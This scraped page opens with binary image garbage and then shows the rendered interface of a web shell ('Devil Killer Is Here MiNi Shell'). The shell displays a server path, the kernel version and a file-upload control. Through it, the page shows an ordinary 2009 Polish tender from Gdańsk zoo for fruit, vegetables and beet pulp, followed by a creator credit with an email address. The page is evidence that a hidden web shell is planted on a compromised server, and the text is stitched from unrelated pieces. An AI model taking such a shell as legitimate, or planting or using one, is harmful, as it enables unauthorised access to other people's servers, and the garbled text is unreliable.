JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090728/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090728/121957-N-2009.html

<p class="kh_header"><b>Gdańsk Oliwa: Dostawa warzyw, owoców i wysłodków buraczanych do 
Miejskiego Ogrodu Zoologicznego Wybrzeża Jednostki Budżetowej 
w Gdańsku - Oliwie ul. Karwieńska 3</b><br>
<b>Numer ogłoszenia: 121957 - 2009; data zamieszczenia: 28.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ogród Zoologiczny "Wybrzeża" , ul. Karwieńska 3, 80-328 Gdańsk Oliwa, woj. pomorskie, tel. 058 5520041, fax 058 5521751.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ogrody zoologiczne i botaniczne.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa warzyw, owoców i wysłodków buraczanych do 
Miejskiego Ogrodu Zoologicznego Wybrzeża Jednostki Budżetowej 
w Gdańsku - Oliwie ul. Karwieńska 3.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część A - warzywa
Zadanie I:
a)	03.22.11.12-4 - marchew w ilości 50.000 kg 
b)	03.21.21.00-1 - ziemniak w ilości 20.000 kg
c)	03.22.11.10-0 - burak czerwony w ilości 30.000 kg	
d)	03.22.12.22-8 - burak pastewny w ilości 30.000 kg
e)	03.22.11.10-0 - brukiew jadalna w ilości 2.500 kg
f)	03.22.13.00-9 - jarmuż w ilości 1.000 kg
g)	03.22.11.12-4 - marchew młoda w ilości 3.000 kg
h)	03.22.14.10-3 - kapusta biała w ilości 13.000 kg
i)	03.22.11.10-0 - pietruszka korzeń w ilości 1.500 kg
j)	03.22.13.00-9 - por w ilości 2.500 kg
k)	03.22.11.10-0 - seler w ilości 3.500 kg
l)	03.22.14.20-6 - kalafior w ilości 700 kg
m)	03.22.14.00-0 - kalarepa w ilości 900 kg

Zadanie II:
a)	03.22.13.10-2 - sałata w ilości 12.000 szt.
b)	03.22.14.00-0 - kapusta pekińska w ilości 2.700 kg	
c)	03.22.11.13-1 - szczypior gruntowy w ilości 300 kg
d)	03.22.12.00-8 - arbuzy w ilości 1.800 kg
e)	03.22.12.00-8 - melon żółty w ilości 2.000 kg
f)	03.21.12.00-5 - kukurydza cukrowa kolby w ilości 500 kg
g)	03.22.14.30-9 - brokuły w ilości 700 kg
h)	03.22.11.10-0 - pietruszka zielona (natka) w ilości 150 kg
i)	03.22.12.40-0 - pomidory w ilości 2.700 kg
j)	03.22.12.30-7 - papryka czerwona w ilości 2.700 kg
k)	03.22.12.70-9 - ogórki w ilości 2.700 kg
l)	03.22.11.10-0 - botwina gruntowa w ilości  400 kg
m)	03.22.11.14-8 - rzodkiewka bez liści w ilości 150 kg
n)	03.22.11.13-1 - cebula w ilości 2.200 kg
o)	03.22.12.12-5 - fasola szparagowa zielona w ilości 700 kg
p)	03.22.11.14-8 - biała rzodkiew w ilości 800 kg
q)	03.22.11.13-1 - czosnek w ilości 5 kg
r)	03.22.13.00-9 - cykoria w ilości 700 kg
s)	03.11.13.00-5 - słonecznik (tarcza) w ilości 80 kg
t)	03.22.10.00-6 - seler naciowy w ilości 1.400 kg
u)	03.22.12.00-8 - dynia w ilości 1.000 kg
v)	03.22.12.50-3 - cukinia w ilości 2.000 kg

Część B - owoce i orzechy

Zadanie III:
a)	03.22.23.21-9 - jabłka w ilości 15.000 kg
b)	03.22.23.22-6 - gruszki w ilości 2.000 kg
a)	03.22.23.13-0 - truskawki 150 kg
b)	03.22.23.30-5 - czereśnie 50 kg
c)	03.22.23.33-6 - wiśnie 80 kg
d)	03.22.23.34-3 - śliwki węgierki 80 kg
e)	03.22.23.00-6 - aronia 20 kg
f)	03.22.23.10-9 - czarne jagody (borówka czarna) 20 kg
g)	03.22.23.11-6 - czarna porzeczka 20 kg
h)	03.22.23.11-6 - czerwona porzeczka 20 kg

Zadanie IV:
a)	03.22.21.11-4 - banany w ilości 7.000 kg
b)	03.22.22.10-8 - cytryny w ilości 550 kg
c)	03.22.21.18-3 - pomarańcze w ilości 2000 kg
d)	03.22.21.18-3 - kiwi w ilości 1200 kg
e)	03.22.23.30-5 - nektarynki w ilości 450 kg
f)	03.22.23.40-8 - winogrona w ilości 1.400 kg
g)	03.22.21.00-4 - granaty w ilości 700 kg

Zadanie V:
a)	03.11.12.00-4 - orzeszki ziemne w łupinie w ilości 250 kg
b)	03.22.20.00-3 - orzechy laskowe w łupinie w ilości 200 kg
c)	03.22.20.00-3 - orzechy włoskie krajowe w łupinie w ilości 50 kg
d)	03.22.20.00-3 - orzechy laskowe łuskane w ilości 180 kg
e)	03.22.20.00-3 - orzechy włoskie krajowe łuskane w ilości 50 kg

Część C.
Zadanie VI - wysłodki buraczane suszone zwykłe w ilości 9.000 kg.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.21.21.00-1, 03.22.20.00-3, 15.83.20.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu oraz opis sposobu dokonania oceny spełnienia tych warunków

1.O udzielenie zamówienia mogą ubiegać się wykonawcy , którzy spełniają warunki:
-	zgodne z art.22 ust.1 Ustawy
-	nie podlegają wykluczeniu z postępowania na podstawie art.24 ust.1 i 2 Ustawy
-	zawarte w specyfikacji

2.Do udziału w postępowaniu zostaną dopuszczeni Wykonawcy, którzy:
a)	złożą ofertę w wyznaczonym terminie - rozdz. II  pkt.6.0 specyfikacji
b)	złożona oferta będzie spełniać wymogi zawarte w instrukcji dla oferentów - rozdz. II pkt.1 (opis sposobu przygotowania oferty)
c)	Złożona oferta musi zawierać wszystkie wymagane oświadczenia i dokumenty - zgodnie z rozdz. II pkt.3.0 specyfikacji

3.W przetargu mogą wziąć udział Wykonawcy, którzy spełnią następujące wymagania:
a)	warzywa muszą być przechowywane w odpowiednich magazynach oraz dostarczane samochodem typu izoterma
b)	marchew, burak czerwony, pietruszka korzeń, seler, brukiew jadalna, buraki pastewne,
muszą być płukane w płuczkarce
c)	owoce muszą być przechowywane w chłodni i dostarczane samochodem typu Izoterma posiadającym zezwolenie na przewóz żywności
d)	Wykonawcy nie będący producentami w zakresie przedmiotu zamówienia muszą wskazać producentów w zakresie obejmującym  złożoną ofertę. Powyższy wymóg dotyczy zadań: 
I, II, III (dotyczy jabłek i gruszek)
e)	Wykonawcy muszą udokumentować należyte wykonanie ( referencje , oświadczenia o wykonaniu zamówienia od poprzednich Zamawiających  z podaniem wielkości zrealizowanych dostaw) w ciągu ostatnich pięciu lat minimum trzech zamówień o wartości i wielkości nie mniejszej niż 70%  złożonej przez siebie oferty,.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.

1. Wraz z ofertą wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu wymienione w art.22 ust.1 Ustawy oraz o nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Ustawy (załącznik nr 1 do specyfikacji).


2. Wykonawca składa ofertę na formularzu ofertowym - załącznik nr 2 do specyfikacji

3. Do formularza ofertowego należy dołączyć:
a)	cennik jednostkowy (wyliczenie ceny ofertowej poszczególnych zadań)
b)	pełnomocnictwo do reprezentowania wykonawców występujących wspólnie w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego oraz każdy z Wykonawców występujących wspólnie musi dołączyć dokumenty zgodnie z rozdz. II pkt.3.4.
c)	wykaz producentów, bądź oświadczenie o pochodzeniu produktów z własnej produkcji, należy dołączyć aktualny dokument dopuszczający do obrotu prawnego producenta w zakresie, który będzie przez niego produkowany,
d)	umowy z producentami, bądź oświadczenia producentów o zapewnieniu wielkości dostaw dla zadań I, II, III (dotyczy jabłek i gruszek) - dotyczy Wykonawców nie będących producentami,
e)	parafowany wzór umowy
f)	dokumenty potwierdzające spełnienie warunków o których mowa w rozdz. II pkt.2.3. każdy Wykonawca przygotowuje indywidualnie
g)	opis warunków produkcji , przechowywania i transportu, posiadane certyfikaty, nagrody itp.:
powyższy załącznik każdy oferent opracowuje indywidualnie bez wskazanego
wzoru. Powinien on zawierać informację dotyczącą pochodzenia przedmiotu
dostaw - producenta, posiadanego zaplecza ( grunty, magazyny, oraz środków transportowych.)
Zamawiający zastrzega sobie możliwość sprawdzenia danych zawartych przez oferenta w załączniku dotyczącym warunków produkcji i transportu, przed zakończeniem postępowania o udzielenie zamówienia publicznego, poprzez wizytację.
W razie stwierdzenia przez komisję, że oferent podał w ofercie dane nieprawdziwe komisja przetargowa ma prawo wykluczyć oferenta z dalszego postępowania.

4. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności Zamawiający żąda, w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę, następujących dokumentów:
1) aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; rolnicy przedstawiają dokumenty poświadczające posiadanie gospodarstwa

5.W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia, zamawiający żąda następujących dokumentów:

1) wykazu wykonanych w okresie ostatnich pięciu lat dostaw, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością (minimum 70% wartości oferty) dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że dostawy te zostały wykonane należycie (referencje ,oświadczenia o należytym wykonaniu zamówienia od poprzednich Zamawiających)

2) dokumentu potwierdzającego dopuszczenie środka transportu do przewozu żywności..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zoo.gd.pl/podstrona przetargi.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ogród Zoologiczny  Wybrzeża 
Jednostka Budżetowa
80-328 Gdańsk - Oliwa ul. Karwieńska 3
tel. 552-00-41, fax. 552-17-51.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2009 godzina 09:00, miejsce: .Miejscem składania ofert jest siedziba Miejskiego Ogrodu Zoologicznego Wybrzeża w Gdańsku -Oliwie przy ul. Karwieńskiej 3, w pokoju nr 3 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa warzyw.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie I:
a)	03.22.11.12-4 - marchew w ilości 50.000 kg 
b)	03.21.21.00-1 - ziemniak w ilości 20.000 kg
c)	03.22.11.10-0 - burak czerwony w ilości 30.000 kg	
d)	03.22.12.22-8 - burak pastewny w ilości 30.000 kg
e)	03.22.11.10-0 - brukiew jadalna w ilości 2.500 kg
f)	03.22.13.00-9 - jarmuż w ilości 1.000 kg
g)	03.22.11.12-4 - marchew młoda w ilości 3.000 kg
h)	03.22.14.10-3 - kapusta biała w ilości 13.000 kg
i)	03.22.11.10-0 - pietruszka korzeń w ilości 1.500 kg
j)	03.22.13.00-9 - por w ilości 2.500 kg
k)	03.22.11.10-0 - seler w ilości 3.500 kg
l)	03.22.14.20-6 - kalafior w ilości 700 kg
m)	03.22.14.00-0 - kalarepa w ilości 900 kg

Zadanie II:
a)	03.22.13.10-2 - sałata w ilości 12.000 szt.
b)	03.22.14.00-0 - kapusta pekińska w ilości 2.700 kg	
c)	03.22.11.13-1 - szczypior gruntowy w ilości 300 kg
d)	03.22.12.00-8 - arbuzy w ilości 1.800 kg
e)	03.22.12.00-8 - melon żółty w ilości 2.000 kg
f)	03.21.12.00-5 - kukurydza cukrowa kolby w ilości 500 kg
g)	03.22.14.30-9 - brokuły w ilości 700 kg
h)	03.22.11.10-0 - pietruszka zielona (natka) w ilości 150 kg
i)	03.22.12.40-0 - pomidory w ilości 2.700 kg
j)	03.22.12.30-7 - papryka czerwona w ilości 2.700 kg
k)	03.22.12.70-9 - ogórki w ilości 2.700 kg
l)	03.22.11.10-0 - botwina gruntowa w ilości  400 kg
m)	03.22.11.14-8 - rzodkiewka bez liści w ilości 150 kg
n)	03.22.11.13-1 - cebula w ilości 2.200 kg
o)	03.22.12.12-5 - fasola szparagowa zielona w ilości 700 kg
p)	03.22.11.14-8 - biała rzodkiew w ilości 800 kg
q)	03.22.11.13-1 - czosnek w ilości 5 kg
r)	03.22.13.00-9 - cykoria w ilości 700 kg
s)	03.11.13.00-5 - słonecznik (tarcza) w ilości 80 kg
t)	03.22.10.00-6 - seler naciowy w ilości 1.400 kg
u)	03.22.12.00-8 - dynia w ilości 1.000 kg
v)	03.22.12.50-3 - cukinia w ilości 2.000 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.21.21.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość warunki produkcji, przechowywania, transportu - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa owoców.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie III:
a)	03.22.23.21-9 - jabłka w ilości 15.000 kg
b)	03.22.23.22-6 - gruszki w ilości 2.000 kg
a)	03.22.23.13-0 - truskawki 150 kg
b)	03.22.23.30-5 - czereśnie 50 kg
c)	03.22.23.33-6 - wiśnie 80 kg
d)	03.22.23.34-3 - śliwki węgierki 80 kg
e)	03.22.23.00-6 - aronia 20 kg
f)	03.22.23.10-9 - czarne jagody (borówka czarna) 20 kg
g)	03.22.23.11-6 - czarna porzeczka 20 kg
h)	03.22.23.11-6 - czerwona porzeczka 20 kg
zgodnie z sezonem

Zadanie IV:
a)	03.22.21.11-4 - banany w ilości 7.000 kg
b)	03.22.22.10-8 - cytryny w ilości 550 kg
c)	03.22.21.18-3 - pomarańcze w ilości 2000 kg
d)	03.22.21.18-3 - kiwi w ilości 1200 kg
e)	03.22.23.30-5 - nektarynki w ilości 450 kg
f)	03.22.23.40-8 - winogrona w ilości 1.400 kg
g)	03.22.21.00-4 - granaty w ilości 700 kg

Zadanie V:
a)	03.11.12.00-4 - orzeszki ziemne w łupinie w ilości 250 kg
b)	03.22.20.00-3 - orzechy laskowe w łupinie w ilości 200 kg
c)	03.22.20.00-3 - orzechy włoskie krajowe w łupinie w ilości 50 kg
d)	03.22.20.00-3 - orzechy laskowe łuskane w ilości 180 kg
e)	03.22.20.00-3 - orzechy włoskie krajowe łuskane w ilości 50 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.20.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com